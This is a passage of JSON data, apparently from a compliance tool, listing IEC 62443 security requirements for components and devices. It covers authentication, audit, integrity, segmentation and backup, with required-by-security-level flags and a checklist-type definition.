infrastructure certificates","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"ccb81ee9-073d-4deb-aed5-7972b2d212a3","Name":"CR-1-9 Strength of public key-based authentication","Description":"","subReqTypeIDs":["cfd6bbed-bff7-44e9-866a-ea3a217cb32c"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"cfd6bbed-bff7-44e9-866a-ea3a217cb32c","Name":"RE-1 Hardware security for public key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","Name":"CR-1-10 Authenticator feedback","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"370cc79b-a473-4247-b171-4ad0233a0a34","Name":"CR-1-11 Unsuccessful login attempts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":true}}}},{"ID":"a8e6d55e-3440-46b1-8624-bcb1bd8364cc","Name":"CR-1-12 System use notifications","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c5230fd4-d5f9-4229-8f71-170617397b3a","Name":"NDR-1-13 Access via untrusted networks","Description":"","subReqTypeIDs":["3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2","Name":"RE-1 Explicit access request approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"65a904e7-9c92-4932-946e-042b19d5c7c9","Name":"NDR-1-14 Strength of symmetric key-based authentication","Description":"","subReqTypeIDs":["1177ff8e-e4b0-49cf-b59f-f01ed37401e6"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1177ff8e-e4b0-49cf-b59f-f01ed37401e6","Name":"RE-1 Hardware security for symmetric key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"dda8e95b-17ba-465f-a789-430d5a378ee1","Name":"CR-2-1 Authorization enforcement","Description":"","subReqTypeIDs":["8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","2872406c-cd16-433f-af5d-23401f08c6eb","39f2063b-c426-4504-a00e-4d77a69aba7e","646f8c75-c631-4b2e-af11-4d069816cefe"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","Name":"RE-1 Authorization enforcement for all users (human, software, processes, devices)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2872406c-cd16-433f-af5d-23401f08c6eb","Name":"RE-2 Permission mapping of roles","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"39f2063b-c426-4504-a00e-4d77a69aba7e","Name":"RE-3 Supervisor override","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"646f8c75-c631-4b2e-af11-4d069816cefe","Name":"RE-4 Dual approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"ff84fa60-5084-438a-9536-7f2fb011c9b3","Name":"CR-2-2 Wireless use control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8cfe7593-93b6-4b0c-a715-caddbc7d18cb","Name":"CR-2-3 Use control for portable and mobile devices","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"532c1932-789e-4fbb-8167-6d63eb789c92","Name":"SAR-2-4 Mobile code","Description":"","subReqTypeIDs":["eb2fbe1f-2d10-40cf-ba68-c72e03b3154b"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"eb2fbe1f-2d10-40cf-ba68-c72e03b3154b","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"401ef547-ea2c-4398-8015-66490cb02976","Name":"EDR-2-4 Mobile code ","Description":"","subReqTypeIDs":["b8252e5d-de07-4b58-bab7-0869f9bed5a2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b8252e5d-de07-4b58-bab7-0869f9bed5a2","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"37d9f118-5bb7-4691-976b-2c949172dce3","Name":"HDR-2-4 Mobile code","Description":"","subReqTypeIDs":["6bafc0b1-efbf-4eb9-a83d-c4e8714420bc"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6bafc0b1-efbf-4eb9-a83d-c4e8714420bc","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"5740c4a1-403c-482a-a235-fff4444fb92e","Name":"NDR-2-4 Mobile code","Description":"","subReqTypeIDs":["8db6ce88-f19f-4f3d-8d8e-6dfefff6123c"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8db6ce88-f19f-4f3d-8d8e-6dfefff6123c","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","Name":"CR-2-5 Session lock","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3e691ca4-eb77-4be1-902e-04c75aefcd00","Name":"CR-2-6 Remote session termination","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3af81552-bb3f-4125-99d2-6127fa74c428","Name":"CR-2-7 Concurrent session control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"779d3751-b9bd-4e97-80db-70a0631181ad","Name":"CR-2-8 Auditable events","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"ed08bb4b-7e98-47b1-bf97-cbce20a304cd","Name":"CR-2-9 Audit storage capacity","Description":"","subReqTypeIDs":["c504eafc-876f-47a4-8a60-cb0f7816747e"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c504eafc-876f-47a4-8a60-cb0f7816747e","Name":"RE-1 Warn when audit record storage capacity threshold reached","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":true}}}},{"ID":"5c662093-fd9f-4861-ae05-41f91e6a3514","Name":"CR-2-10 Response to audit processing failures","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0317d147-90d9-4879-bf07-6e167c0dc533","Name":"CR-2-11 Timestamps","Description":"","subReqTypeIDs":["9c3f74c1-f63b-4b83-843d-c67a63c634a5","6137a0c0-5939-4857-a44c-c117a3d99531"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c3f74c1-f63b-4b83-843d-c67a63c634a5","Name":"RE-1 Time synchronization","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6137a0c0-5939-4857-a44c-c117a3d99531","Name":"RE-2 Protection of time source integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,false,true],"ReqFulfillRule":{}},{"ID":"3d164cce-adde-41cd-9470-c0e60ff22559","Name":"CR-2-12 Non-repudiation","Description":"","subReqTypeIDs":["5fea8725-6bae-4cf8-9a3a-ec4669bec7a1"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"5fea8725-6bae-4cf8-9a3a-ec4669bec7a1","Name":"RE-1 Non-repudiation for all users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"77a29d2d-372e-4c12-b538-81f95afd6e0b","Name":"EDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1243b38d-ea80-424c-946c-c8f9aef190fd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1243b38d-ea80-424c-946c-c8f9aef190fd","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"956c289a-0cd4-4e8c-831a-b327c8dbbde5","Name":"HDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["735882c4-439f-4cca-a97f-0e535519fe2f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"735882c4-439f-4cca-a97f-0e535519fe2f","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","Name":"NDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1a69695b-d04e-409d-9256-4be696ea78df"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1a69695b-d04e-409d-9256-4be696ea78df","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"79bd4891-d677-4c06-91d6-3bc414e59193","Name":"CR-3-1 Communication integrity","Description":"","subReqTypeIDs":["79b5872c-1d0e-498f-8fe7-c97f1163a4b3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"79b5872c-1d0e-498f-8fe7-c97f1163a4b3","Name":"RE-1 Communication authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"c5b4aa95-a00a-42b3-96ca-31d98557a19c","Name":"SAR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b26d4748-2b7c-4821-b11a-f51fd7e85307","Name":"EDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a51e9e7-b87f-4d62-85df-288320d456f1","Name":"HDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":["888d4fc0-a127-4890-9de2-46a3235ff069"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"888d4fc0-a127-4890-9de2-46a3235ff069","Name":"RE-1 Report version of code protection","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"13a182cc-6caa-4193-8fd2-4b497e0a16ed","Name":"NDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c8a4b08-ce26-467d-8d7d-bf9db81f8944","Name":"CR-3-3 Security functionality verification","Description":"","subReqTypeIDs":["a6729f24-7a95-432b-a61c-98c2621246e0"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"a6729f24-7a95-432b-a61c-98c2621246e0","Name":"RE-1 Security functionality verification during normal operation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"63a333db-4074-4ebc-9fa5-63a248e9e3e1","Name":"CR-3-4 Software and information integrity","Description":"","subReqTypeIDs":["73159393-9139-4f82-9980-a28e2285c936","d62835c2-73c9-4fdd-a01c-a92a613ba773"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"73159393-9139-4f82-9980-a28e2285c936","Name":"RE-1 Authenticity of software and information","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d62835c2-73c9-4fdd-a01c-a92a613ba773","Name":"RE-2 Automated notification of integrity violations","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"b6dcb790-3ce2-4635-839e-3b2032499ffa","Name":"CR-3-5 Input validation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0d163821-ac6f-4969-81d6-821afc8f181e","Name":"CR-3-6 Deterministic output","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","Name":"CR-3-7 Error handling","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","Name":"CR-3-8 Session integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f74ea015-618a-4553-86b8-c2917ff637ae","Name":"CR-3-9 Protection of audit information","Description":"","subReqTypeIDs":["df820586-0d90-4d3a-848b-31695c26f589"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"df820586-0d90-4d3a-848b-31695c26f589","Name":"RE-1 Audit records on write-once media","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"41defa29-c849-4680-847b-9f40fabc7286","Name":"EDR-3-10 Support for updates","Description":"","subReqTypeIDs":["f38c5728-f34c-412e-92da-323f7b4e9a81"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ac95cfac-e4b9-4639-a066-3bf7df6c7c73","Name":"HDR-3-10 Support for updates","Description":"","subReqTypeIDs":["16784a5f-9b1c-49b8-aafb-38efb2d353d3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1a731a13-8b40-4b33-aa7f-286a3bc2882a","Name":"NDR-3-10 Support for updates","Description":"","subReqTypeIDs":["4e1187a2-cc24-44be-9224-f623a08d9c4d"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f38c5728-f34c-412e-92da-323f7b4e9a81","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"16784a5f-9b1c-49b8-aafb-38efb2d353d3","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"4e1187a2-cc24-44be-9224-f623a08d9c4d","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e62acf0c-4013-468c-9bb7-7940d0270e69","Name":"EDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["af74cb52-979d-4d87-8f90-c5e7bd89bd24"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"af74cb52-979d-4d87-8f90-c5e7bd89bd24","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"57d7ca9b-b06e-4273-800f-8caa19dfb1e7","Name":"HDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["715c78fa-1a00-48be-8041-00d51fbaaea3"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"715c78fa-1a00-48be-8041-00d51fbaaea3","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","Name":"NDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["db0f3812-37c4-4a42-994d-eed41733aecd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db0f3812-37c4-4a42-994d-eed41733aecd","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","Name":"EDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d6b5b544-3184-43ba-bc05-ae90bf503067","Name":"HDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"15b54837-a7f6-4e95-8773-9b999abfa998","Name":"NDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2e279fd1-f688-4c9a-aee2-abff49d6b1ab","Name":"EDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db2383ba-3aba-408b-8317-6c10af37d1ea","Name":"HDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d30db9ad-4a71-4e14-bc8f-718834d56e03","Name":"NDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d8332abf-0ac2-4096-bde8-02f5716ba15e","Name":"EDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["ea71647c-8da7-47d1-afbb-74c1f2a650c3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b4c58d1f-016b-4244-baf3-e2ee57eff599","Name":"HDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["05e9457f-fbee-4d97-9544-602355a9cfcf"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","Name":"NDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["f5f5cd83-4363-4d82-bae8-1d544d819817"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ea71647c-8da7-47d1-afbb-74c1f2a650c3","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"05e9457f-fbee-4d97-9544-602355a9cfcf","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f5f5cd83-4363-4d82-bae8-1d544d819817","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"926c6b5b-0a1f-4833-a612-97691a10d83f","Name":"CR-4-1 Information confidentiality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6cefc8a9-b69b-4197-961c-dbbc27cbd23b","Name":"CR-4-2 Information persistence","Description":"","subReqTypeIDs":["f7aecf4a-2116-4ae0-91b1-3662d934c780","a89a4958-6563-4000-94c0-89c8f6e8957c"],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"4854fee5-99e3-4c4b-8b53-4c37629005d0","Name":"CR-4-3 Use of cryptography","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f7aecf4a-2116-4ae0-91b1-3662d934c780","Name":"RE-1 Erase of shared memory resources","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"a89a4958-6563-4000-94c0-89c8f6e8957c","Name":"RE-2 Erase verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"8ed9c57b-fbe4-435a-8036-501cf5a95f3e","Name":"CR-5-1 Network segmentation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"98d81760-6978-4372-809a-8303352c53b7","Name":"NDR-5-2 Zone boundary protection","Description":"","subReqTypeIDs":["1baf9958-8f82-471a-878f-b1fffa8635d5","e63f8128-7889-4913-8e11-9d47ec988ddf","77ae236f-11a6-4736-bb48-57c54ab5db07"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1baf9958-8f82-471a-878f-b1fffa8635d5","Name":"RE-1 Deny all, permit by exeption","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e63f8128-7889-4913-8e11-9d47ec988ddf","Name":"RE-2 Island mode","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"77ae236f-11a6-4736-bb48-57c54ab5db07","Name":"RE-3 Fail close","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"b06635ce-dc29-44de-a719-81829a3962de","Name":"NDR-5-3 General purpose, person-to-person communication restrictions","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"72adfa45-cc4e-4539-ad87-99d1f46f4eab","Name":"CR-6-1 Audit log accessibility","Description":"","subReqTypeIDs":["1b81685b-6009-4433-b015-8a27125c2d21"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1b81685b-6009-4433-b015-8a27125c2d21","Name":"RE-1 Programmatic access to audit logs","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"798e83ee-b5ad-46c2-8bd5-58c968e8390a","Name":"CR-6-2 Continuous monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"64064d6d-e701-4ebf-ab84-3f702b32b8ff","Name":"CR-7-1 Denial of service protection","Description":"","subReqTypeIDs":["1c033715-b1c1-45f1-a39d-0aeda88a1682"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"d07a5fcc-e3fa-4525-8253-e5463c56a905","Name":"CR-7-2 Resource management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1c033715-b1c1-45f1-a39d-0aeda88a1682","Name":"RE-1 Manage communication load from component","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1936692f-af1c-4335-b9c4-60ff1da57ae1","Name":"CR-7-3 Control system backup","Description":"","subReqTypeIDs":["1e5aec13-f2b6-4039-9f67-fa343e2c8098"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0c455f28-1b52-4d02-b358-fc13ae9c2e85","Name":"CR-7-4 Control system recovery and reconstruction","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1e5aec13-f2b6-4039-9f67-fa343e2c8098","Name":"RE-1 Backup integrity verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2b6d967f-e572-4e6a-a5dd-11cdce427df4","Name":"CR-7-5 Emergency-power supply","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,false,false,false],"ReqFulfillRule":{}},{"ID":"1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","Name":"CR-7-6 Network and security configuration settings","Description":"","subReqTypeIDs":["ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"08cf1ab2-c34b-473e-a332-4e99c616db7d","Name":"CR-7-7 Least functionality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8d84eb63-48d8-41e8-aeb1-ef767a5fb572","Name":"CR-7-8 Control system component inventory","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f","Name":"RE-1 Machine-readable reporting of current security settings","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}}],"checklistTypes":[{"ID":"afc63fe6-27cc-4ab5-b44e-adcb29ecab49","Name":"IEC-62443","Description":"CR: Component requirement, SAR: Software application requirement, EDR: Embedded device requirement, HDR: Host device requirement, NDR: Network device requirement","requirementTypeIDs":["b008aede-3518-44f3-8cc2-7e92b68e0329","d47f441d-e3bf-461d-b724-47a90c19bc89","83a019dd-d28b-4f3d-bf48-e254d2031445","b7bcf087-c925-4eec-9a11-e042250afbf1","f28381c7-5c24-4fd3-b75e-03fbebe03857","bd31bc1e-43ed-48f2-80ae-885680bcd378","40670f38-5fd9-47a3-994b-41a271a71694","72982bda-38dc-4904-8080-4e7a37df743d","ccb81ee9-073d-4deb-aed5-7972b2d212a3","da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","370cc79b-a473-4247-b171-4ad0233a0a34","a8e6d55e-3440-46b1-8624-bcb1bd8364cc","c5230fd4-d5f9-4229-8f71-170617397b3a","65a904e7-9c92-4932-946e-042b19d5c7c9","dda8e95b-17ba-465f-a789-430d5a378ee1","ff84fa60-5084-438a-9536-7f2fb011c9b3","8cfe7593-93b6-4b0c-a715-caddbc7d18cb","532c1932-789e-4fbb-8167-6d63eb789c92","401ef547-ea2c-4398-8015-66490cb02976","37d9f118-5bb7-4691-976b-2c949172dce3","5740c4a1-403c-482a-a235-fff4444fb92e","6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","3e691ca4-eb77-4be1-902e-04c75aefcd00","3af81552-bb3f-4125-99d2-6127fa74c428","779d3751-b9bd-4e97-80db-70a0631181ad","ed08bb4b-7e98-47b1-bf97-cbce20a304cd","5c662093-fd9f-4861-ae05-41f91e6a3514","0317d147-90d9-4879-bf07-6e167c0dc533","3d164cce-adde-41cd-9470-c0e60ff22559","77a29d2d-372e-4c12-b538-81f95afd6e0b","956c289a-0cd4-4e8c-831a-b327c8dbbde5","2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","79bd4891-d677-4c06-91d6-3bc414e59193","c5b4aa95-a00a-42b3-96ca-31d98557a19c","b26d4748-2b7c-4821-b11a-f51fd7e85307","8a51e9e7-b87f-4d62-85df-288320d456f1","13a182cc-6caa-4193-8fd2-4b497e0a16ed","9c8a4b08-ce26-467d-8d7d-bf9db81f8944","63a333db-4074-4ebc-9fa5-63a248e9e3e1","b6dcb790-3ce2-4635-839e-3b2032499ffa","0d163821-ac6f-4969-81d6-821afc8f181e","1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","f74ea015-618a-4553-86b8-c2917ff637ae","41defa29-c849-4680-847b-9f40fabc7286","ac95cfac-e4b9-4639-a066-3bf7df6c7c73","1a731a13-8b40-4b33-aa7f-286a3bc2882a","e62acf0c-4013-468c-9bb7-7940d0270e69","57d7ca9b-b06e-4273-800f-8caa19dfb1e7","4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","d6b5b544-3184-43ba-bc05-ae90bf503067","15b54837-a7f6-4e95-8773-9b999abfa998","2e279fd1-f688-4c9a-aee2-abff49d6b1ab","db2383ba-3aba-408b-8317-6c10af37d1ea","d30db9ad-4a71-4e14-bc8f-718834d56e03","d8332abf-0ac2-4096-bde8-02f5716ba15e","b4c58d1f-016b-4244-baf3-e2ee57eff599","88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","926c6b5b-0a1f-4833-a612-97691a10d83f","6cefc8a9-b69b-4197-961c-dbbc27cbd23b","4854fee5-99e3-4c4b-8b53-4c37629005d0","8ed9c57b-fbe4-435a-8036-501cf5a95f3e","98d81760-6978-4372-809a-8303352c53b7","b06635ce-dc29-44de-a719-81829a3962de","72adfa45-cc4e-4539-ad87-99d1f46f4eab","798e83ee-b5ad-46c2-8bd5-58c968e8390a","64064d6d-e701-4ebf-ab84-3f702b32b8ff","d07a5fcc-e3fa-4525-8253-e5463c56a905","1936692f-af1c-4335-b9c4-60ff1da57ae1","0c455f28-1b52-4d02-b358-fc13ae9c2e85","2b6d967f-e572-4e6a-a5dd-11cdce427df4","1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","08cf1ab2-c34b-473e-a332-4e99c616db7d","8d8